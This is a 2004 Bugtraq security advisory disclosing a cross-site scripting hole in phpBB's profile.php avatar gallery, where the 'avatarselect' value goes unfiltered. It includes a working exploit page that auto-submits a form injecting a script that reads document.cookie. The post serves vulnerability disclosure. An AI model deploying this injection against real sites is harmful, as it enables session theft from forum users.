[34198] in bugtraq
phpBB profile.php Cross Site Scripting Vulnerability
daemon@ATHENA.MIT.EDU (Cheng Peng Su)
Mon Mar 22 13:27:06 2004
Date: 21 Mar 2004 03:36:19 -0000
Message-ID: <20040321033619.22792.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Cheng Peng Su <apple_soup@msn.com>
To: bugtraq@securityfocus.com
#####################################################################
Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
Release Date : Mar 21,2004
Application : phpBB
Version : phpBB 2.0.6d or others?
Platform : PHP
Vendor URL : http://www.phpbb.com/
Author : Cheng Peng Su(apple_soup_at_msn.com)
#####################################################################
Proof of Conecpt:
This vuln is in profile.php,when you click [Show Gallery],phpBB
will show you Avatar gallery,asking you to choose one for yourself.
The hole is in the form,after submitting phpBB will use the value of
"avatarselect" as the path of the gallery directly,without filtering
any illegal characters.
Exploit:
-------------exploit.htm--------------
<form name='f' action="http://site/profile.php?mode=editprofile" method="post">
<input name="avatarselect" value='" ><script>alert(document.cookie)</script>'>
<input type="submit" name="submitavatar" value="Select avatar">
</form>
<script>
window.onload=function()
{
document.all.submitavatar.click();
}
</script>
---------------end-------------------
Contact:
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com
